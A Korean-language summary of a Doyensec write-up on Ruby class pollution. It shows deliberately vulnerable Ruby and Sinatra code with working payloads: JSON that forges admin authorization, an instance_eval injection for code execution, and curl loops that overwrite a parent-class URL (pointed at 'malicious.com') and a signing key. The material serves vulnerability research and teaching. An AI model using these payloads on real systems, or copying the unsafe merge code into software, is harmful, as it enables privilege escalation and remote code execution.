Ruby Class Pollution

Reading time: 8 minutes

이것은 포스트의 요약입니다 https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html

Merge on Attributes

예:

# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html
# Comments added to exploit the merge on attributes
require 'json'


# Base class for both Admin and Regular users
class Person

attr_accessor :name, :age, :details

def initialize(name:, age:, details:)
@name = name
@age = age
@details = details
end

# Method to merge additional data into the object
def merge_with(additional)
recursive_merge(self, additional)
end

# Authorize based on the `to_s` method result
def authorize
if to_s == "Admin"
puts "Access granted: #{@name} is an admin."
else
puts "Access denied: #{@name} is not an admin."
end
end

# Health check that executes all protected methods using `instance_eval`
def health_check
protected_methods().each do |method|
instance_eval(method.to_s)
end
end

private

# VULNERABLE FUNCTION that can be abused to merge attributes
def recursive_merge(original, additional, current_obj = original)
additional.each do |key, value|

if value.is_a?(Hash)
if current_obj.respond_to?(key)
next_obj = current_obj.public_send(key)
recursive_merge(original, value, next_obj)
else
new_object = Object.new
current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
end
else
current_obj.instance_variable_set("@#{key}", value)
current_obj.singleton_class.attr_accessor key
end
end
original
end

protected

def check_cpu
puts "CPU check passed."
end

def check_memory
puts "Memory check passed."
end
end

# Admin class inherits from Person
class Admin < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end

def to_s
"Admin"
end
end

# Regular user class inherits from Person
class User < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end

def to_s
"User"
end
end

class JSONMergerApp
def self.run(json_input)
additional_object = JSON.parse(json_input)

# Instantiate a regular user
user = User.new(
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
)


# Perform a recursive merge, which could override methods
user.merge_with(additional_object)

# Authorize the user (privilege escalation vulnerability)
# ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.authorize

# Execute health check (RCE vulnerability)
# ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.health_check

end
end

if ARGV.length != 1
puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

설명

1. 권한 상승: authorize 메서드는 to_s가 "Admin"을 반환하는지 확인합니다. JSON을 통해 새로운 to_s 속성을 주입함으로써 공격자는 to_s 메서드가 "Admin"을 반환하게 만들어 무단 권한을 부여받을 수 있습니다.
2. 원격 코드 실행: health_check에서 instance_eval은 protected_methods에 나열된 메서드를 실행합니다. 공격자가 사용자 정의 메서드 이름(예: "puts 1")을 주입하면, instance_eval이 이를 실행하여 **원격 코드 실행(RCE)**로 이어질 수 있습니다.
3. 이는 해당 속성의 문자열 값을 실행하는 취약한 eval 명령어가 있기 때문에 가능합니다.
4. 영향 제한: 이 취약점은 개별 인스턴스에만 영향을 미치며, 다른 User 및 Admin 인스턴스에는 영향을 주지 않아, 악용 범위를 제한합니다.

실제 사례

ActiveSupport의 deep_merge

기본적으로 취약하지 않지만 다음과 같은 방법으로 취약하게 만들 수 있습니다:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
merged_hash = to_h.deep_merge(other_object)

merged_hash.each do |key, value|
self.class.attr_accessor key
instance_variable_set("@#{key}", value)
end

self
end

Hashie의 deep_merge

Hashie의 deep_merge 메서드는 일반 해시가 아닌 객체 속성에서 직접 작동합니다. 이는 예외가 있는 병합에서 속성으로 메서드의 교체를 방지합니다: _, !, 또는 ?로 끝나는 속성은 여전히 객체에 병합될 수 있습니다.

특별한 경우로는 속성 **_**가 있습니다. 단순히 _는 일반적으로 Mash 객체를 반환하는 속성입니다. 그리고 이것이 예외의 일부이기 때문에 수정할 수 있습니다.

다음 예제를 확인하세요. {"_": "Admin"}를 전달하면 _.to_s == "Admin"을 우회할 수 있습니다:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

# Method to merge additional data into the object using hashie
def merge_with(other_object)
deep_merge!(other_object)
self
end

# Authorize based on to_s
def authorize
if _.to_s == "Admin"
puts "Access granted: #{@name} is an admin."
else
puts "Access denied: #{@name} is not an admin."
end
end

end

# Admin class inherits from Person
class Admin < Person
def to_s
"Admin"
end
end

# Regular user class inherits from Person
class User < Person
def to_s
"User"
end
end

class JSONMergerApp
def self.run(json_input)
additional_object = JSON.parse(json_input)

# Instantiate a regular user
user = User.new({
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
})

# Perform a deep merge, which could override methods
user.merge_with(additional_object)

# Authorize the user (privilege escalation vulnerability)
# Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
# Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
user.authorize
end
end

if ARGV.length != 1
puts "Usage: ruby hashie.rb 'JSON_STRING'"
exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

클래스를 오염시키기

다음 예제에서는 Person 클래스를 찾을 수 있으며, Person 클래스를 상속받는 Admin 클래스와 Regular 클래스도 찾을 수 있습니다. 또한 **KeySigner**라는 다른 클래스도 있습니다:

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
@@url = "http://default-url.com"

attr_accessor :name, :age, :details

def initialize(name:, age:, details:)
@name = name
@age = age
@details = details
end

def self.url
@@url
end

# Method to merge additional data into the object
def merge_with(additional)
recursive_merge(self, additional)
end

private

# Recursive merge to modify instance variables
def recursive_merge(original, additional, current_obj = original)
additional.each do |key, value|
if value.is_a?(Hash)
if current_obj.respond_to?(key)
next_obj = current_obj.public_send(key)
recursive_merge(original, value, next_obj)
else
new_object = Object.new
current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
end
else
current_obj.instance_variable_set("@#{key}", value)
current_obj.singleton_class.attr_accessor key
end
end
original
end
end

class User < Person
def initialize(name:, age:, details:)
super(name: name, age: age, details: details)
end
end

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
@@signing_key = "default-signing-key"

def self.signing_key
@@signing_key
end

def sign(signing_key, data)
"#{data}-signed-with-#{signing_key}"
end
end

class JSONMergerApp < Sinatra::Base
# POST /merge - Infects class variables using JSON input
post '/merge' do
content_type :json
json_input = JSON.parse(request.body.read)

user = User.new(
name: "John Doe",
age: 30,
details: {
"occupation" => "Engineer",
"location" => {
"city" => "Madrid",
"country" => "Spain"
}
}
)

user.merge_with(json_input)

{ status: 'merged' }.to_json
end

# GET /launch-curl-command - Activates the first gadget
get '/launch-curl-command' do
content_type :json

# This gadget makes an HTTP request to the URL stored in the User class
if Person.respond_to?(:url)
url = Person.url
response = Net::HTTP.get_response(URI(url))
{ status: 'HTTP request made', url: url, response_body: response.body }.to_json
else
{ status: 'Failed to access URL variable' }.to_json
end
end

# Curl command to infect User class URL:
# curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

# GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
get '/sign_with_subclass_key' do
content_type :json

# This gadget signs data using the signing key stored in KeySigner class
signer = KeySigner.new
signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

{ status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
end

# Curl command to infect KeySigner signing key (run in a loop until successful):
# for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

# GET /check-infected-vars - Check if all variables have been infected
get '/check-infected-vars' do
content_type :json

{
user_url: Person.url,
signing_key: KeySigner.signing_key
}.to_json
end

run! if app_file == $0
end

Poison Parent Class

이 페이로드로:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

부모 클래스 **Person**의 @@url 속성 값을 수정하는 것이 가능합니다.

다른 클래스 오염

이 페이로드로:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

정의된 클래스를 무차별 대입하여 KeySigner 클래스의 값을 injected-signing-key로 수정하여 오염시킬 수 있습니다.\

References

• https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html